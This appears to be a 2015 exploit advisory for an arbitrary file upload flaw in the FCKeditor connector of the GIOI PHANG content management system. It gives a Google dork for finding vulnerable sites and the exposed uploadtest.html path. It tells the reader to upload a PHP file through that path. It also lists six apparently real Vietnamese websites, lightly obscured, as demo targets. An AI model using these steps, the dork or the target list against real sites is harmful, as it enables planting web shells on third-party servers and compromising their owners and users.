######################################################################################## # # Exploit Title : GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability # Exploit Author : Linux Zone Research Team # Vendor Homepage: http://tgp.vn # Google Dork : intext:Powered (+) Designed THE GIOI PHANG Ltd. # Date : 14-December-2015 # Tested On : Linux - Chrome # MY HOME : http://linux-zone.org # ###############################[ DESCRITION ]##################################### # # GIOI PHANG Arbitrary File Upload Vulnerability .. # Vietnam Content Management System Site By tgp.vn # Published By Linux Zone Research Team # ###############################[ LOCATION + Exploit ]############################# # # exploit => /editor/filemanager/connectors/uploadtest.html # # first go to Target => http://site.com/ # # Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html # # select => Select the "File Uploader"> php ... upload to : Uploaded File URL: # ##############################[ Demo ]############################################ # # http://www.lavaXdigital.vn/editor/filemanager/connectors/uploadtest.html # # http://hypertecXh.vn/editor/filemanager/connectors/uploadtest.html # # http://www.pXhohoiresort.com/editor/filemanager/connectors/uploadtest.html # # http://thienphonXg.vn/editor/filemanager/connectors/uploadtest.html # # http://tg-electriXc.com.vn/editor/filemanager/connectors/uploadtest.html # # http://www.phXohoiresort.com/editor/filemanager/connectors/uploadtest.html # ################################################################################### # # Hassan Shakeri - Mohammad Habili # # Twitter : @ShakeriHassan - Fb.com/General.BlackHat ###################################################################################